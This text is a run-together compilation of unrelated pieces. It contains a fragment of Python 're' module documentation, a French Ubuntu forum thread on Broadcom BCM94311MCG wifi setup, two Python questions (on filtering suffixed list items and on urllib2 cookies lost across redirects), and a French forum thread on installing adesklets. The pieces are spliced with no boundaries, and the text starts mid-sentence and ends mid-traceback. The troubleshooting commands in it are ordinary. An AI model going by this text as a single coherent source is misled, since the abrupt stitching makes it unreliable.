(new_string, number). split(pattern, string, maxsplit=0) Split the source string by the occurrences of the pattern, returning a list containing the resulting substrings. findall(pattern, string, flags=0) Return a list of all non-overlapping matches in the string. finditer(pattern, string, flags=0) Return an iterator over all non-overlapping matches in the string. compile(pattern, flags=0) Compile a regular expression pattern, returning a pattern object. purge() Clear the regular expression cache template(pattern, flags=0) Compile a template pattern, returning a pattern object escape(pattern) Escape all non-alphanumeric characters in pattern. _expand(pattern, match, template) IGNORECASE = 2 I = 2 LOCALE = 4 L = 4 UNICODE = 32 U = 32 MULTILINE = 8 M = 8 DOTALL = 16 S = 16 VERBOSE = 64 X = 64 TEMPLATE = 1 T = 1 DEBUG = 128 _alphanum = {'0': 1, '1': 1, '2': 1, '3': 1, '4': 1, '5': 1, '... _cache = {(<type 'str'>, '', 0): re.compile(r''), (<type 'str'... _cache_repl = {('#\\1\\3\\2', re.compile(r'#(..)(..)(..)')): (... _MAXCACHE = 100 Imports: sys, sre_compile, sre_parse, _pattern_type, copy_reg sub(pattern, repl, string, count=0) Return the string obtained by replacing the leftmost non-overlapping occurrences of the pattern in string by the replacement repl. repl can be either a string or a callable; if a callable, it's passed the match object and must return a replacement string to be used. subn(pattern, repl, string, count=0) Return a 2-tuple containing (new_string, number). new_string is the string obtained by replacing the leftmost non-overlapping occurrences of the pattern in the source string by the replacement repl. number is the number of substitutions that were made. repl can be either a string or a callable; if a callable, it's passed the match object and must return a replacement string to be used. findall(pattern, string, flags=0) Return a list of all non-overlapping matches in the string. If one or more groups are present in the pattern, return a list of groups; this will be a list of tuples if the pattern has more than one group. Empty matches are included in the result. finditer(pattern, string, flags=0) Return an iterator over all non-overlapping matches in the string. For each match, the iterator returns a match object. Empty matches are included in the result. _alphanum Value: {'0': 1, '1': 1, '2': 1, '3': 1, '4': 1, '5': 1, '6': 1, '7': 1, ... _cache Value: {(<type 'str'>, '', 0): re.compile(r''), (<type 'str'>, '\r\n', 0): re.compile(r'\r\n'), (<type 'str'>, ' *$', 0): re.compile(r' *$'), (<type 'str'>, ' +', 0): re.compile(r' +'), (<type 'str'>, '#.*', 0): re.compile(r'#.*'), (<type 'str'>, '( +|\\n)', 0): re.compile(r'( +|\n)'), (<type 'str'>, '( +|\\n|[^ \\n\\\\\\/]*[\\\\\\/])', 0): re.compile(r' ( +|\n|[^ \n\\/]*[\\/])'), ... _cache_repl Value: {('#\\1\\3\\2', re.compile(r'#(..)(..)(..)')): ([(1, 1), (2, 3), (3, 2)], ['#', None, None, None]), ('#\\2\\2\\2', re.compile(r'#(..)(..)(..)')): ([(1, 2), (2, 2), (3, 2 ...
Kedoc Re : script install wifi BCM94311MCG Petit point... Je me suis aperçu ce soir qu'il me suffit d'utiliser l'interrupteur matériel de ma carte pour l'éteindre et la rallumer, un coup au démarrage sous Ubuntu, et je peux ensuite l'utiliser (en wifi ouvert, et en WEP, ça fonctionne). Je n'ai pas encore bien compris, c'est pas encore le top, mais c'est déjà ça. Par ailleurs, j'ai un autre petit soucis... wicd dont j'ai mis le tray au lancement de la session (suivant la même démarche que celle du wiki) ne s'affiche pas immédiatement... Je suppose qu'ils se lance bien, en tout cas, il se réserve une place dans le system tray... Mais l'icà´ne ne s'affiche réellement qu'une fois que j'ai lancé le gui depuis le menu Internet ou que j'ai exécuté une commande ifconfig ou iwconfig depuis un terminal... Etrange ! :-o Dernière modification par Kedoc (Le 21/12/2007, à 21:39) Kedoc Hors ligne yakusa77 Re : script install wifi BCM94311MCG perso , encore une fois je préfère network-manager (question de gout) wicd peut être utile dans le cas de certaine carte, mais dans le notre donc si préfère changer je t'y encourage (par experience). Pour ce qui es du bouton effectivement il est fonctionnel, mais normallement au demarrage il doit s'activé. Hors ligne jadjay Re : script install wifi BCM94311MCG Salut à tous j'ai suivi avec grand intéret vos discussions, j'ai une carte 01:00.0 Network controller: Broadcom Corporation BCM94311MCG wlan mini-PCI (rev 02) Et j'utilise le fichier sp34152.exe (me demandez pas pourquoi... ) En tout cas, wicd et nm ne marche pas DU TOUT, ils refusent littérallement de se connecter alors qu'ils scannent tout les réseaux... (me demandez pas pourquoi... ) Par contre en lançant ce petit script au début de chaque session #!/bin/sh # xxxxxxxxxx sudo iwconfig wlan0 essid monreseau key xxxxxxxxxxx sudo dhclient wlan0 ça marche du feu de dieu (me demandez pas pourquoi... ) Alors (me demandez pas pourquoi... ) mais par contre éclairez ma lanterne je vous en prie... Cordialement [Portable] Compaq Presario C750ef - DualCore - Intel 965GM - BCM94311MCG - 2Go - 160Go - Ubuntu x86 Lucid Lynx [Desktop] Intel dual Core - Intel VGA - 2Go Ram - 2x500Go DD - Ubuntu Lucid Lynx amd64 ----- "J'critique pas le coté farce, mais pour le fair-play y'aurait quand même à dire." Antonio (Ventura) dans Ne Nous Fâchons Pas Hors ligne safinaz Re : script install wifi BCM94311MCG donne le retour de cat /etc/network/interfaces yakusa77 Re : script install wifi BCM94311MCG oui je serai interésse aussi ...:| Hors ligne safinaz Re : script install wifi BCM94311MCG D'abord avec la rev 02, c'est normal que tu passes par sp34152.exe, je l'ai dit dans un des postes précédents. yakusa77 Re : script install wifi BCM94311MCG En tout cas, wicd et nm ne marche pas DU TOUT, ils refusent littérallement de se connecter alors qu'ils scannent tout les réseaux... (me demandez pas pourquoi... ) peut etre que sa vient de ton encryption WPA ,WEP ? parce que si il scanne c'est sa marche en theorie Dernière modification par yakusa77 (Le 23/12/2007, à 01:20) Hors ligne jadjay Re : script install wifi BCM94311MCG donne le retour de cat /etc/network/interfaces Wouala $ cat /etc/network/interfaces auto lo iface lo inet loopback iface pan0 inet dhcp auto pan0 iface bnep0 inet static address 10.0.253.1 netmask 255.255.255.240 [Portable] Compaq Presario C750ef - DualCore - Intel 965GM - BCM94311MCG - 2Go - 160Go - Ubuntu x86 Lucid Lynx [Desktop] Intel dual Core - Intel VGA - 2Go Ram - 2x500Go DD - Ubuntu Lucid Lynx amd64 ----- "J'critique pas le coté farce, mais pour le fair-play y'aurait quand même à dire." Antonio (Ventura) dans Ne Nous Fâchons Pas Hors ligne yakusa77 Re : script install wifi BCM94311MCG safinaz a écrit : donne le retour de cat /etc/network/interfaces Wouala $ cat /etc/network/interfaces auto lo iface lo inet loopback iface pan0 inet dhcp auto pan0 iface bnep0 inet static address 10.0.253.1 netmask 255.255.255.240 pour ma part je n'est que sa: auto loiface lo inet loopback et de cette facon sa accroche niquel je n'es aucun probleme tu peut eventuellement en faire une sauvegarde et ensuite tu vire tout le reste iface lo inet loopback iface pan0 inet dhcp auto pan0 iface bnep0 inet static address 10.0.253.1 netmask 255.255.255.240 tout ceci n'es pas utile. Essaye et dit moi si ca fonctionne Hors ligne jadjay Re : script install wifi BCM94311MCG Hum disons que ce qu'il ya en plus est un "hack" pour connecter a internet mon mobile via mon portable j'essayerais de le virer mais de toute façon au début ça n'y était pas et ça ne marchais pas mieux... Je pense que wicd ou network-manager de gnome ne font pas un truc (lequel????) que moi je fais avec mon pitit script tout mort... J'ai également eu du mal à me connecter chez mon père qui a une livebox... La clé était repéré comme wpa alors que mon père se connecte en wep... (encore un nouveau mystère)... Bref je vais continuer mes tests si vous avez des commentaires supplémentaires ou d'autres idées n'hésitez pas... [Portable] Compaq Presario C750ef - DualCore - Intel 965GM - BCM94311MCG - 2Go - 160Go - Ubuntu x86 Lucid Lynx [Desktop] Intel dual Core - Intel VGA - 2Go Ram - 2x500Go DD - Ubuntu Lucid Lynx amd64 ----- "J'critique pas le coté farce, mais pour le fair-play y'aurait quand même à dire." Antonio (Ventura) dans Ne Nous Fâchons Pas Hors ligne yakusa77 Re : script install wifi BCM94311MCG juste une question bete: as tu installer ta carte via le script dont il es question dans ce post ? et sous quel version d'ubuntu tu te trouve ? gutsy, feisty .. ton install du systeme est elle recente ? parce que moi je travail sur mon presario en liveUSB persistent et à chaque fois que j'ai installé la carte sa a fonctionné niquel et je suis sous gutsy, j'ai pas precisez ce detail... Hors ligne jadjay Re : script install wifi BCM94311MCG idem ça va figuerez dans ma signature dés maintenant gutsy x86 Je n'ai pas utiliser le script mais j'ai fais rigoureusement la même chose à la main plusieurs fois install récente [Portable] Compaq Presario C750ef - DualCore - Intel 965GM - BCM94311MCG - 2Go - 160Go - Ubuntu x86 Lucid Lynx [Desktop] Intel dual Core - Intel VGA - 2Go Ram - 2x500Go DD - Ubuntu Lucid Lynx amd64 ----- "J'critique pas le coté farce, mais pour le fair-play y'aurait quand même à dire." Antonio (Ventura) dans Ne Nous Fâchons Pas Hors ligne yakusa77 Re : script install wifi BCM94311MCG ok , de toute facon effectivement les etapes sont assez simple et largement réalisable manuellement. Mais sa semble bizarre y a quelque chose qui cloche... Hors ligne jadjay Re : script install wifi BCM94311MCG J'ai trouvé ce message dans /var/log/user.log dhcdbd: message_handler: message handler not found under /com/redhat/dhcp/wlan0 for sub-path wlan0.dbus.get.reason Je recherche de partout mais je ne trouve rien à ce propos... [Portable] Compaq Presario C750ef - DualCore - Intel 965GM - BCM94311MCG - 2Go - 160Go - Ubuntu x86 Lucid Lynx [Desktop] Intel dual Core - Intel VGA - 2Go Ram - 2x500Go DD - Ubuntu Lucid Lynx amd64 ----- "J'critique pas le coté farce, mais pour le fair-play y'aurait quand même à dire." Antonio (Ventura) dans Ne Nous Fâchons Pas Hors ligne yakusa77 Re : script install wifi BCM94311MCG regarde cette page il semble y avoir des truc interessant http://ubuntuforums.org/archive/index.php/t-178619.html attention c'est en anglais par contre Hors ligne jadjay Re : script install wifi BCM94311MCG Héhéhé en fait j'ai désactivé une fois compiz relancé dhcdbd et maintenant ça marche tranquille... Les erreurs bizarres faut toujours voir si compiz participe pas au délire... Donc maintenant j'ai nm-applet qui roule et compiz qui roule aussi... L'erreur exact? MYSTERE................ [Portable] Compaq Presario C750ef - DualCore - Intel 965GM - BCM94311MCG - 2Go - 160Go - Ubuntu x86 Lucid Lynx [Desktop] Intel dual Core - Intel VGA - 2Go Ram - 2x500Go DD - Ubuntu Lucid Lynx amd64 ----- "J'critique pas le coté farce, mais pour le fair-play y'aurait quand même à dire." Antonio (Ventura) dans Ne Nous Fâchons Pas Hors ligne Kedoc Re : script install wifi BCM94311MCG Bonjour, J'utilise désormais wicd (avec plus ou moins de succès), mais depuis quelques jour, il ne se lance plus... root@compaq-laptop:~# /opt/wicd/gui.py attempting to connect daemon... success starting... refreshing... disabling ip disabling dns changing profile... [...] ESSID : NEUF_1028 making a new network entry... disabling ip disabling dns 0 ESSID : SlashCross making a new network entry... disabling ip disabling dns 0 Traceback (most recent call last): File "/opt/wicd/gui.py", line 956, in <module> app = appGui() File "/opt/wicd/gui.py", line 695, in __init__ self.refresh_networks(fresh=False) File "/opt/wicd/gui.py", line 878, in refresh_networks tempNetwork = PrettyWirelessNetworkEntry(x) File "/opt/wicd/gui.py", line 297, in __init__ PrettyNetworkEntry.__init__(self,WirelessNetworkEntry(networkID)) File "/opt/wicd/gui.py", line 539, in __init__ print "ESSID : " + wireless.GetWirelessProperty(networkID,"essid") File "/var/lib/python-support/python2.5/dbus/proxies.py", line 135, in __call__ **keywords) File "/var/lib/python-support/python2.5/dbus/connection.py", line 603, in call_blocking message, timeout) dbus.exceptions.DBusException: org.freedesktop.DBus.Python.UnicodeError: Traceback (most recent call last): File "/var/lib/python-support/python2.5/dbus/service.py", line 698, in _message_cb _method_reply_return(connection, message, method_name, signature, *retval) File "/var/lib/python-support/python2.5/dbus/service.py", line 239, in _method_reply_return reply.append(signature=signature, *retval) UnicodeError: String parameters to be sent over D-Bus must be valid UTF-8 Là, j'ai deux remarques... La première est que je n'ai pas de chance... La seconde est que je donne ma langue au chat... Quelqu'un a une idée ? Kedoc Hors ligne safinaz Re : script install wifi BCM94311MCG sudo apt-get remove wicd sudo rm -rf /opt/wicd/ télécharge http://downloads.sourceforge.net/wicd/wicd_1.3.8-all.deb?modtime=1196593368&big_mirror double clique pour installer puis lance le Kedoc Re : script install wifi BCM94311MCG C'est parfait... Merci encore ! Kedoc Hors ligne &ti'jean& Re : script install wifi BCM94311MCG salut a tous. j' ai aussi un présario C700, et évidament mon wifi ne fonctionne pas non plus. Je débute donc je ne suis pas forcément un as, mais quand je vois vos solutions et en particulier celle de yakusa77 ca m'inspire confiance. comme je l'ai dit précedament je suis pas un as et j'aimerais qu'on m'éxplique plus simplement si c'est possible? Alors y a t'il quelqu'un dans les parrages pour m'aider? Merci d'avance pour vos recherches. PS: Je suis sous ubuntu 7.10 et mon bradcom est une version (rev 2) Hors ligne jadjay Re : script install wifi BCM94311MCG &ti'jean& Et si tu nous en disais plus sur ton probleme? Rapport à ce que tu as déjà essayé... [Portable] Compaq Presario C750ef - DualCore - Intel 965GM - BCM94311MCG - 2Go - 160Go - Ubuntu x86 Lucid Lynx [Desktop] Intel dual Core - Intel VGA - 2Go Ram - 2x500Go DD - Ubuntu Lucid Lynx amd64 ----- "J'critique pas le coté farce, mais pour le fair-play y'aurait quand même à dire." Antonio (Ventura) dans Ne Nous Fâchons Pas Hors ligne yakusa77 Re : script install wifi BCM94311MCG ==>&ti'jean& fait un copié du code posté dans le premier message. copie le dans un nouveau fichier (par exemple ouvre l'editeur de texte). enregitre-le sous le nom que tu veut, par exemple "installbcm94311mcg" rend le executable par un clic droit sur le fichier >onglet permission en bas coche la case "éxecuté comme un programme" puis lance le en double cliquant dessus et choisi le choix "lancer" et laisse toi guidé . normallement quand tu va redemarrer ton voyant wifi devriendra bleu (signe que sa fonctionne) ensuite il te restera plus qu'a rentré ta clé via nm applet (les 2 tv dans le systray ) si ta carte fonctionne bien elle devra t'affiché la liste des reseau disponible attention si clé wep a dix chiffre choisir 64/128 hex systeme ouvert Dernière modification par yakusa77 (Le 14/01/2008, à 13:59) Hors ligne &ti'jean& Re : script install wifi BCM94311MCG Le truc sais qu'avec le microprogramme mon voyant marche parfaitement mais je pense que sa vien plus de mon ip. Et le wifi ne repère rien alors que par cable j'arrive à me connecter!: pti-jean@pti-jean-ordi:~$ iwlist scan lo Interface doesn't support scanning. eth0 Interface doesn't support scanning. eth1 No scan results pti-jean@pti-jean-ordi:~$ ndiswrapper -l bcmwl5 : invalid driver! pti-jean@pti-jean-ordi:~$ Hors ligne &ti'jean& Re : script install wifi BCM94311MCG pti-jean@pti-jean-ordi:~$ iface bnep0 inet static bash: iface : commande introuvable Hors ligne safinaz Re : script install wifi BCM94311MCG donne les retours de lspci iwlist scan as tu une connexion cà¢blée
How to detect string suffixes and remove these suffixed elements from list?I understand that this looks like an NLP, stemming/lemmatization task but the task requires a simpler function. Given, i need to remove elements that has s and es suffixes if the non-suffixed items exist in the list: alist = ['bar','barbar','foo','foos','barbares','foofoos','bares'] I need to output: alist = ['bar','barbar','foo','foofoos'] I've tried the following but it doesn't work because when i sort out the alist, it gets ['bar', 'barbar', 'barbares', 'bares', 'foo', 'foofoos', 'foos'] not ['bar', 'bares', 'barbar', 'barbares', 'foo', 'foos', 'foofoos'] alist = ['bar','barbar','foo','foos','barbares','foofoos','bares'] prev = "" no_s_list = [] for i in sorted(alist): if i[-2:] == "es" and i[:-2] == prev: continue elif i[-1:] == "s" and i[:-1] == prev: contine else: prev = i no_s_list.append(i) The above outputs: >>> sorted(alist) ['bar', 'barbar', 'barbares', 'bares', 'foo', 'foofoos', 'foos']
I am using liburl2 with CookieJar / HTTPCookieProcessor in an attempt to simulate a login to a page to automate an upload. I've seen some questions and answers on this, but nothing which solves my problem. I am losing my cookie when I simulate the login which ends up at a 302 redirect. The 302 response is where the cookie gets set by the server, but urllib2 HTTPCookieProcessor does not seem to save the cookie during a redirect. I tried creating a HTTPRedirectHandler class to ignore the redirect, but that didn't seem to do the trick. I tried referencing the CookieJar globally to handle the cookies from the HTTPRedirectHandler, but 1. This didn't work (because I was handling the header from the redirector, and the CookieJar function that I was using, extract_cookies, needed a full request) and 2. It's an ugly way to handle it. I probably need some guidance on this as I'm fairly green with Python. I think I'm mostly barking up the right tree here, but maybe focusing on the wrong branch. cj = cookielib.CookieJar() cookieprocessor = urllib2.HTTPCookieProcessor(cj) class MyHTTPRedirectHandler(urllib2.HTTPRedirectHandler): def http_error_302(self, req, fp, code, msg, headers): global cj cookie = headers.get("set-cookie") if cookie: # Doesn't work, but you get the idea cj.extract_cookies(headers, req) return urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers) http_error_301 = http_error_303 = http_error_307 = http_error_302 cookieprocessor = urllib2.HTTPCookieProcessor(cj) # Oh yeah. I'm using a proxy too, to follow traffic. proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8888'}) opener = urllib2.build_opener(MyHTTPRedirectHandler, cookieprocessor, proxy) Addition: I had tried using mechanize as well, without success. This is probably a new question, but I'll pose it here since it is the same ultimate goal: This simple code using mechanize, when used with a 302 emitting url (http://fxfeeds.mozilla.com/firefox/headlines.xml) -- note that the same behavior occurs when not using set_handle_robots(False). I just wanted to ensure that wasn't it: import urllib2, mechanize browser = mechanize.Browser() browser.set_handle_robots(False) opener = mechanize.build_opener(*(browser.handlers)) r = opener.open("http://fxfeeds.mozilla.com/firefox/headlines.xml") Output: Traceback (most recent call last): File "redirecttester.py", line 6, in <module> r = opener.open("http://fxfeeds.mozilla.com/firefox/headlines.xml") File "build/bdist.macosx-10.6-universal/egg/mechanize/_opener.py", line 204, in open File "build/bdist.macosx-10.6-universal/egg/mechanize/_urllib2_fork.py", line 457, in http_response File "build/bdist.macosx-10.6-universal/egg/mechanize/_opener.py", line 221, in error File "build/bdist.macosx-10.6-universal/egg/mechanize/_urllib2_fork.py", line 332, in _call_chain File "build/bdist.macosx-10.6-universal/egg/mechanize/_urllib2_fork.py", line 571, in http_error_302 File "build/bdist.macosx-10.6-universal/egg/mechanize/_opener.py", line 188, in open File "build/bdist.macosx-10.6-universal/egg/mechanize/_mechanize.py", line 71, in http_request AttributeError: OpenerDirector instance has no attribute '_add_referer_header' Any ideas?
tomtom Re : [HOW TO] adesklets : installation sous Ubuntu Breezy raaah ! j'ai un probleme d'interpreteur python ! J'ai installé toutes les librairies via synaptic et adesklets aussi. J'ai DL YAB (Yet Another Bar) et j'ai ca : [i]tomtom@barad-luin:/mnt/config/programmes/adesklets/yab-0.0.2$ [/i][b]ls -l[/b] total 56 -rw-r--r-- 1 tomtom tomtom 1624 2005-02-25 08:45 config.txt.minimal -rw-r--r-- 1 tomtom tomtom 15145 2005-02-25 08:45 COPYING -rw-r--r-- 1 tomtom tomtom 2523 2005-02-25 08:45 GNUmakefile drwxr-xr-x 2 tomtom tomtom 192 2005-02-25 08:45 icons -rw-r--r-- 1 tomtom tomtom 1137 2005-02-25 08:45 README -rwxr-xr-x 1 tomtom tomtom 26564 2005-02-25 08:45 yab.py [i]tomtom@barad-luin:/mnt/config/programmes/adesklets/yab-0.0.2$[/i][b] ./yab.py[/b] bash: ./yab.py: /usr/bin/env: bad interpreter: Permission non accordée [i]tomtom@barad-luin:/mnt/config/programmes/adesklets/yab-0.0.2$[/i] Pourtant, j'ai installé toutes les librairies !! Mais j'ai le meme problème d'interpreteur pour perl et j'ai pas réussi a régler le problème. Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Alors, pour Bismut : l'endroit où tu places les fichiers que tu télécharges, décompresses, compiles n'a pas vraiment d'importance, vu que tout ce petit monde ne te seras plus utile une fois que l'installation se sera bien passée (tu pourras tout supprimer). J'ai donné l'exemple du home parce que ça me parraît plus simple et plus logique mais rien ne t'empêche de tout mettre dans un répertoire temp ou autre (il faut juste que tu adaptes tes commandes en fonction). Pour les liens symboliques, c'est Rapass qui a proposé cette solution (mais il y en a sans doute une autre plus propre mais on a pas trouvé). Pour Sallé, est-ce que ça le fait pour tous les desklets ? Peux-tu en lancer un totalement en console et préciser les messages qui s'affichent, je veux dire en faisant cd /chemin_vers_ton_desklet./nom_du_desklet Dernière modification par toma222 (Le 24/11/2005, à 12:52) Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy tomtom, je suis étonné par le chemin que tu as mis pour tes desklets (/mnt/....). As-tu essayé de les mettre dans ton home ? Ca pourrait expliquer le permission non accordées. Hors ligne tomtom Re : [HOW TO] adesklets : installation sous Ubuntu Breezy eh oui ! c'était ca! eh ben!! Merci ! Comment ca se fais que ca ne marche pas si on le met dans un /mnt/...? Dernière modification par tomtom (Le 24/11/2005, à 13:40) Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Sans doute un problème de droits mais je ne peux pas t'en dire plus... Hors ligne simeona Re : [HOW TO] adesklets : installation sous Ubuntu Breezy hello, (Rapass) ... justement j'ai les deux paquets d'installer mais ca marche pas dpkg -l | grep imlib ii gdk-imlib1 1.9.14-16.2ubuntu4 imaging library for use with gtk (usin libp ii imlib-base 1.9.14-16.2ubuntu4 Common files needed by the Imlib/Gdk-I ib p ii imlib-progs 1.9.14-16.2ubuntu4 Configuration program for Imlib and GD Imli ii imlib2-demo 1.2.1.004-1 Imlib2 demo's ii imlib2-loaders 1.2.1.004-1 Additional loaders for Imlib2 ii imlib2-test 1.2.1.004-1 Imlib2 test programs ii libimlib2 1.2.1.004-1 Powerful image loading and rendering l rary ii libimlib2-dev 1.2.1.004-1 Imlib2 headers, static libraries and d umen Hors ligne Rapass Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Je te met le résultat de la même commande chez moi : rapass@maison:~$ dpkg -l | grep imlib ii gdk-imlib1 1.9.14-16.2ubuntu4 imaging library for use with gtk (using libp ii imlib-base 1.9.14-16.2ubuntu4 Common files needed by the Imlib/Gdk-Imlib p ii imlib-progs 1.9.14-16.2ubuntu4 Configuration program for Imlib and GDK-Imli ii imlib1 1.9.14-16.2ubuntu4 imaging library for X and X11 (using libpng2 ii imlib1-dev 1.9.14-16.2ubuntu4 Header files needed for Imlib development (u ii imlib11 1.9.14-17.1 Imlib is an imaging library for X and X11 ii libimlib2 1.2.0-2.2ubuntu2 powerful image loading and rendering library ii libimlib2-dev 1.2.0-2.2ubuntu2 Imlib2 development files Je ne sais pas lequel c'est... Mais ça doit etre dans ceux-la, il faut les tester un par un Dernière modification par Rapass (Le 24/11/2005, à 14:33) Il existe 10 sortes de personnes : celles qui connaissent le binaire, et les autres. Hors ligne simeona Re : [HOW TO] adesklets : installation sous Ubuntu Breezy ca y est ca marche, par contre je sais plus trop cke j'ai fait mais je vais vous dire ca ...... c en train de compiler Hors ligne simeona Re : [HOW TO] adesklets : installation sous Ubuntu Breezy alors, j'ai installer les lib suivants : sudo apt-get install libfontconfig1-dbg libfontconfig1-dev libxft-dev libxft2 libxft2-dbg libftdi0 et ca marche !! Hors ligne Rapass Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Chez moi je n'ai pas les paquets suivants : - libfontconfig1-dbg - libxft-dev - libxft2-dbg - libftdi0 Je suppose donc qu'ils ne sont pas liés à la résolution du problème... Je pense à libfontconfig1-dev, je me rappelle l'avoir mis pour enlever un message d'avertissement Il existe 10 sortes de personnes : celles qui connaissent le binaire, et les autres. Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Moi j'ai seulement libfontconfig1-dev, libxft2, libxft-dev d'installés. C'est fou le nombre de paquets nécessaires, je me souvenais pas qu'il y en avait autant ! Hors ligne simeona Re : [HOW TO] adesklets : installation sous Ubuntu Breezy en fait, je pense que libxft est néccessaire pour imlib. Et vu qu'au début, je pensais que c'etait imlib qui était mal installé, donc je voulais le compiler. Hors ligne Ago Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Bon bah chez moi ça marche bien Par contre, j'ai installé yab, et j'ai un problème: il ouvre deux barre alors que je n'en veux qu'une Quelqu'un peut me dire ce qu'il faut modifier dans le config ? Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Si tu fais clic-droit quitter sur la barre que tu veux enlever elle réapparaît au lancement suivant ? Sinon tu peux aller voir dans le fichier .adesklets de ton home (fichier caché) combien tu as de barre d'enregistrées. Dernière modification par toma222 (Le 24/11/2005, à 19:40) Hors ligne Ago Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Hum... J'ai l'impression que ça ne revient pas, pourtant tout à l'heure... oO Enfin, je suis fatigué Merci Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Hors ligne Ago Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Par contre, j'ai essayé 3-4 autres desklets, et aucun ne marche: rien ne se lance Faut que je m'en tienne là et que je jete mon pourtable par la fenêtre ou j'ai zappé un truc énorme ? Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Tu as bien installé libstatgrab et pystatgrab comme indiqué dans le tuto ? C'est quels desklets exactement qui ne veulent pas se lancer ? Si tu les lances avec le terminal (pas en double cliquant dessus), tu as des messages d'erreurs ? Hors ligne Ago Re : [HOW TO] adesklets : installation sous Ubuntu Breezy J'ai bien suivi le tuto et installé ces librairies en suivant le tuto. Quand je lance le .py, il me demande ssi je veux le tester ou l'installer, et quoi que je réponde, la console se ferme et puis plus rien... Peut-être ai-je mal installé les lib? Comment le savoir ? Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Si tu n'as pas eu de messages d'erreur c'est qu'elles doivent être bien installées. En fait, ce que je veux dire c'est qu'il faut que tu ouvre un terminal, que tu fasses cd ton_chemin_vers_ton_desklets./nom_du_desklets.py Là il ne te demandera pas si tu veux le tester ou l'installer mais tu devrais avoir les messages d'erreurs éventuels (le terminal ne se fermera pas). Dernière modification par toma222 (Le 24/11/2005, à 21:13) Hors ligne Ago Re : [HOW TO] adesklets : installation sous Ubuntu Breezy fabien@laptop:~$ cd /home/fabien/Desklets/acpumon-0.1.1 fabien@laptop:~/Desklets/acpumon-0.1.1$ ./acpumon.py Do you want to (r)egister this desklet or to (t)est it? t Now testing... ============================================================ If you do not see anything (or just an initial flicker in the top left corner of your screen), try `--help', and see the FAQ: `info adesklets'. ============================================================ Traceback (most recent call last): File "./acpumon.py", line 631, in ? Events(dirname(__file__)).pause() File "./acpumon.py", line 293, in __init__ self.text=Text(self.top_canvas,self.config['font'],self.config.color(self.config['font_color']),'CPU Load 1000%','blah') File "./acpumon.py", line 248, in __init__ self.font=adesklets.load_font(font) File "/usr/lib/python2.4/commands.py", line 706, in load_font File "usr/lib/python2.4/site-packages/adesklets/commands_handler.py", line 103, in out adesklets.error_handler.ADESKLETSError: adesklets command error - font 'VeraBd/8' could not be loaded Exception exceptions.AttributeError: "Events instance has no attribute 'comm'" in <bound method Events.__del__ of <__main__.Events instance at 0xb7c2278c>> ignored Voilà... Et je ne vois rien En tout cas, merci de ta patience Hors ligne LacTeuS Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Alors pour ceux qui, comme Bismut, ont peur de tout "dégueulasser" en compilant les applications, vous pouvez utiliser "checkinstall" qui, après que vous ayez lancé un ./configure, se chargera de faire le make, puis il vous pondera un beau package en .deb qu'il installera par la suite. C'est le top sur un système debian comme Ubuntu pour la désinstallation Hors ligne Sallé Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Pour Sallé, est-ce que ça le fait pour tous les desklets ? Peux-tu en lancer un totalement en console et préciser les messages qui s'affichent, je veux dire en faisant cd /chemin_vers_ton_desklet ./nom_du_desklet re! j'ai testé à peu près tous les desklets, et ca l'a fait à chaque fois.... maintenant, en utilisant ta méthode la fenêtre du terminal reste affichée et ca donne ça, en enregistrant le desklet : jerome@Ubuntu:~$ cd /home/jerome/desklets/weather-0.0.4 jerome@Ubuntu:~/desklets/weather-0.0.4$ ./weather.py Do you want to (r)egister this desklet or to (t)est it? r Traceback (most recent call last): File "./weather.py", line 52, in ? import adesklets File "/usr/lib/python2.4/site-packages/PIL/__init__.py", line 43, in ? adesklets.error_handler.ADESKLETSError: adesklets process exited - Exception exceptions.AttributeError: <exceptions.AttributeError instance at 0xb7e082cc> in <bound method _Communicator.__del__ of <adesklets.communicator._Communicator instance at 0xb7b7b30c>> ignored jerome@Ubuntu:~/desklets/weather-0.0.4$ et en le testant : jerome@Ubuntu:~/desklets/weather-0.0.4$ ./weather.py Do you want to (r)egister this desklet or to (t)est it? t Now testing... ============================================================ If you do not see anything (or just an initial flicker in the top left corner of your screen), try `--help', and see the FAQ: `info adesklets'. ============================================================ Traceback (most recent call last): File "./weather.py", line 52, in ? import adesklets File "/usr/lib/python2.4/site-packages/PIL/__init__.py", line 43, in ? adesklets.error_handler.ADESKLETSError: adesklets process exited - Exception exceptions.AttributeError: <exceptions.AttributeError instance at 0xb7e562cc> in <bound method _Communicator.__del__ of <adesklets.communicator._Communicator instance at 0xb7bc930c>> ignored jerome@Ubuntu:~/desklets/weather-0.0.4$ ensuite, beeeeennnnnn.... toujours rien ++ Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Pour Sallé je ne vois pas d'où peut venir ton erreur, désolé. Si quelqu'un d'autre à une idée ? Ago, il semble que tu ais un problème de fonts, essaies de faire sudo apt-get install libfontconfig1-dev libxft2 Hors ligne Ago Re : [HOW TO] adesklets : installation sous Ubuntu Breezy J'ai installé via synaptic libfontconfig1-dev, libxft2 est déjà la version la plus récente installée, et ça marche toujours pas là J'ai droit à ça now: fabien@laptop:~/Desklets/acpumon-0.1.1$ ./acpumon.py Do you want to (r)egister this desklet or to (t)est it? t Now testing... ============================================================ If you do not see anything (or just an initial flicker in the top left corner of your screen), try `--help', and see the FAQ: `info adesklets'. ============================================================ Traceback (most recent call last): File "./acpumon.py", line 631, in ? Events(dirname(__file__)).pause() File "./acpumon.py", line 293, in __init__ self.text=Text(self.top_canvas,self.config['font'],self.config.color(self.config['font_color']),'CPU Load 1000%','blah') File "./acpumon.py", line 248, in __init__ self.font=adesklets.load_font(font) File "/usr/lib/python2.4/commands.py", line 706, in load_font File 